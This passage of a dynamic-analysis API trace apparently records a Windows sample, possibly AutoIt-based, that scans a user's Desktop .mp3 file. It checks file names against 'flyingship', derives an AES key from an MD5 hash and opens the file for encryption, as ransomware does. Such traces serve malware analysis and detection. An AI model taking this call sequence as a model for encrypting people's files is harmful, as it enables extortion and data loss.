cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.108] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0077.108] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0077.108] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0077.108] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0077.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0077.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0077.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0077.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0077.109] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0077.109] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0077.109] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0077.109] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0077.109] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.109] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3", lpFindFileData=0x61e870 | out: lpFindFileData=0x61e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9408690, ftCreationTime.dwHighDateTime=0x1d5e56a, ftLastAccessTime.dwLowDateTime=0x7aadcd00, ftLastAccessTime.dwHighDateTime=0x1d5d8d2, ftLastWriteTime.dwLowDateTime=0x7aadcd00, ftLastWriteTime.dwHighDateTime=0x1d5d8d2, nFileSizeHigh=0x0, nFileSizeLow=0x5c46, dwReserved0=0x61e9c0, dwReserved1=0x657690, cFileName="9MGcT.mp3", cAlternateFileName="")) returned 0x6b89f8 [0077.109] FindClose (in: hFindFile=0x6b89f8 | out: hFindFile=0x6b89f8) returned 1 [0077.109] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.109] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.109] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.109] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.109] PeekMessageW (in: lpMsg=0x61e7ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e7ac) returned 0 [0077.109] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.109] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77710000 [0077.109] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.110] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.110] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0077.110] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0077.110] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0077.110] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.110] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.110] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.110] PeekMessageW (in: lpMsg=0x61e57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e57c) returned 0 [0077.110] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.110] CryptAcquireContextA (in: phProv=0x61e550, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x61e550*=0x696a48) returned 1 [0077.111] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.111] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.111] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0077.111] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0077.111] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0077.111] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.111] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.111] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.111] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.111] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0077.111] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0077.111] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.111] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.111] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.112] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.112] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0077.112] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.112] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.112] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.112] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.112] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.112] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0077.112] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.112] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.112] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.112] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0077.112] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0077.112] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.112] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.112] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.112] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.112] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0077.112] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0077.112] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0077.112] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.112] CryptCreateHash (in: hProv=0x696a48, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x61e2c0 | out: phHash=0x61e2c0) returned 1 [0077.112] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.112] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.112] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.112] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.113] CharLowerBuffW (in: lpsz="byte[22]", cchLength=0x8 | out: lpsz="byte[22]") returned 0x8 [0077.113] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.113] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.113] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.113] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0077.113] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.113] CryptHashData (hHash=0x6b8b38, pbData=0x6f96c8, dwDataLen=0x16, dwFlags=0x1) returned 1 [0077.113] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.113] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.113] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.113] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.113] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0077.113] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0077.113] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0077.113] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.113] CryptDeriveKey (in: hProv=0x696a48, Algid=0x660e, hBaseData=0x6b8b38, dwFlags=0x1, phKey=0x61e2c0 | out: phKey=0x61e2c0*=0x6b8af8) returned 1 [0077.113] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.113] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.113] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.113] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.113] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.113] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.113] PeekMessageW (in: lpMsg=0x61e3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3fc) returned 0 [0077.113] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.113] CryptDestroyHash (hHash=0x6b8b38) returned 1 [0077.113] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.114] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.114] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.114] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.114] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.114] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9mgct.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0077.114] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.114] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61e9f8 | out: lpNewFilePointer=0x0) returned 1 [0077.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0077.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0077.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0077.114] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0077.114] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0077.114] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0077.114] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d928 | out: hHeap=0x650000) returned 1 [0077.114] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0077.114] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5f8 [0077.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1f38 [0077.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0077.114] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1f38 | out: hHeap=0x650000) returned 1 [0077.114] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0077.115] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0077.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b38 [0077.115] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.115] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b38 | out: hHeap=0x650000) returned 1 [0077.115] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.128] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5f8 [0077.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d928 [0077.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0077.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0077.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e300 [0077.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0077.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0077.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0077.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0077.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0077.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0077.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0077.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0077.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0077.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0077.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df88 [0077.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0077.129] 